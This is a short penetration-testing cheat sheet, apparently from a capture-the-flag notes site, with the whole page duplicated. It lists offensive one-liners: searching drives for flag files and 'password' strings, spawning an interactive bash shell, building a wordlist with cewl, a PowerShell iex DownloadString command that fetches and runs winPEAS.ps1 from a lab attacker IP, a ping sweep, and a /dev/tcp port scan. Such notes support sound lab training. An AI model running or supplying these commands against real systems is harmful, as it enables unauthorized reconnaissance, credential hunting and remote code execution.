General

To find stuff in Windows and Linux

dir *flag*.* /s
Grep -rnw /path/to/look  -e /file/to/look
find / 2>/dev/null | grep user.txt
find / -group admin -type f 2>/dev/null

grep -ri "password" /path/to/folder
findstr /s /i /n "password" *.*

To give bin/bash shell

python -c 'import pty;pty.spawn("/bin/bash")'
Or 
/bin/bash -i

custom wordlist

cewl http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks >> words.txt

download on Windows if wget is not working

iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:80/winPEAS.ps1')

Ping sweep

#linux
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

#windows
(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "Reply"

Port scan

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

PreviousCheatsheet NextNMAP

Last updated 2 months ago

General

To find stuff in Windows and Linux

dir *flag*.* /s
Grep -rnw /path/to/look  -e /file/to/look
find / 2>/dev/null | grep user.txt
find / -group admin -type f 2>/dev/null

grep -ri "password" /path/to/folder
findstr /s /i /n "password" *.*

To give bin/bash shell

python -c 'import pty;pty.spawn("/bin/bash")'
Or 
/bin/bash -i

custom wordlist

cewl http://10.10.110.100:65000/wordpress/index.php/languages-and-frameworks >> words.txt

download on Windows if wget is not working

iex (New-Object Net.WebClient).DownloadString('http://10.10.14.11:80/winPEAS.ps1')

Ping sweep

#linux
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done

#windows
(for /L %a IN (1,1,254) DO ping /n 1 /w 1 172.16.2.%a) | find "Reply"

Port scan

for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done

PreviousCheatsheet NextNMAP

Last updated 2 months ago